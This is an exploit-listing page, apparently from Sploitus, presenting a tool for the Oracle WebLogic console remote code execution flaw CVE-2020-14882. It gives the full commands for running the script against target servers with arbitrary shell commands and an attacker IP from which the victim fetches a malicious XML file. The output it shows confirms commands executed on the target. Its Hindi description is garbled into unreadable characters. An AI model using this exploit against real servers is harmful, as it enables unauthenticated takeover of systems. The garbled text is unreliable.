Sploitus

Exploit for CVE-2020-14882

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN36 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MILO2012-CVE-2020-14882
# CVE-2020-14882

CVE-2020-14882

## рд╡рд┐рд╡рд░рдг

Oracle Fusion Middleware рдХреЗ Oracle WebLogic Server рдЙрддреНрдкрд╛рдж рдореЗрдВ рдХрдордЬреЛрд░реА (рдШрдЯрдХ: Console)ред рдкреНрд░рднрд╛рд╡рд┐рдд рд╕рдорд░реНрдерд┐рдд рд╕рдВрд╕реНрдХрд░рдг 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 рдФрд░ 14.1.1.0.0 рд╣реИрдВред рдЖрд╕рд╛рдиреА рд╕реЗ рд╢реЛрд╖рдг рдпреЛрдЧреНрдп рдХрдордЬреЛрд░реА рдПрдХ рдЕрдкреНрд░рдорд╛рдгрд┐рдд рд╣рдорд▓рд╛рд╡рд░ рдХреЛ HTTP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдиреЗрдЯрд╡рд░реНрдХ рдкрд╣реБрдВрдЪ рдХреЗ рд╕рд╛рде Oracle WebLogic Server рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред рдЗрд╕ рдХрдордЬреЛрд░реА рдХреЗ рд╕рдлрд▓ рд╣рдорд▓реЗ Oracle WebLogic

## рдЕрдВрддрд░

Oracle WebLogic рд╕рдВрд╕реНрдХрд░рдг 12.2.1 рд╕реЗ рдкрд╣рд▓реЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рдХреНрд▓рд╛рд╕ 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рдХреНрдпреЛрдВрдХрд┐ рдХреНрд▓рд╛рд╕ 'com.tangosol.coherence.mvel2.sh.ShellSession' рдЙрдкрд▓рдмреНрдз рдирд╣реАрдВ рд╣реИред рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рджреЛ рдХреНрд▓рд╛рд╕реЛрдВ рдХреЗ рдмреАрдЪ рд╕реНрд╡рд┐рдЪ рдХрд░рддреА рд╣реИред

CVE-2020-14882 рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Github рдкрд░ рдЙрдкрд▓рдмреНрдз рдХреБрдЫ рд╡рд░реНрддрдорд╛рди рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗрд╡рд▓ рдХреНрд▓рд╛рд╕ 'com.tangosol.coherence.mvel2.sh.ShellSession' рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддреА рд╣реИрдВ, рдЬрд┐рд╕рдХрд╛ рдЕрд░реНрде рд╣реИ рдХрд┐ рдпреЗ рд╕реНрдХреНрд░рд┐рдкреНрдЯ WebLogic рд╕рдВрд╕реНрдХрд░рдг 10.3.6.0.0 рдФрд░ 12.1.3.0.0 рдкрд░ рд╡рд┐рдлрд▓ рд╣реЛ рдЬрд╛рдПрдВрдЧреАред

## рдЪрд░рдг

root@kitploit:~
    
    
    % python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
    [*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
    [*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
    172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
    172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
    172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
    

root@kitploit:~
    
    
    % python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
    http://127.0.0.1:7001/console/login/LoginForm.jsp
    [*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
    [*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
    Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux